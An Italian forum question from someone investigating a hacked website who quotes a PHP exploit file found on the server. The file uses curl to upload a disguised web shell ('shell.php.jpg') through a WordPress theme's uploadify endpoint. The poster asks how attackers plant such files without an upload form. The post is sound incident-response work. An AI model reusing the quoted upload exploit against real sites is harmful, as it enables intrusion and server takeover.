Mi è stato affidato un sito web esistente per il quale dovrei apportare alcune modifiche alla parte di progettazione, ma quando stavo per accedervi, ho visto che è stato compromesso. Quando stavo cercando il problema, ho trovato un file PHP di exploit contenente questo codice:
$uploadfile="shell.php.jpg";
$ch = curl_init("http://macwallpaper.net/wp-content/themes/echea/js/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
Riesco a capire cosa sta facendo questo script, ma non ho idea di come l'autore dell'attacco sia riuscito a caricarlo sul server. L'unica forma che il sito Web aveva era un modulo di contatto, ed era solo la parte HTML senza la funzione di posta. Inoltre, ho trovato altri 4 file PHP progettati come shell, con un sacco di codice all'interno, quindi non ho intenzione di postarlo qui.
Esistono modi per distribuire tali pacchetti senza un modulo di caricamento, in realtà senza un modulo?
EDIT: il sito web ha un database, ma nessun'altra piattaforma di controllo come un portale di amministrazione o una zona client (non esiste un accesso diretto al database), ha un ftp, ma non ho altre informazioni riguardanti ssh / scp, ecc.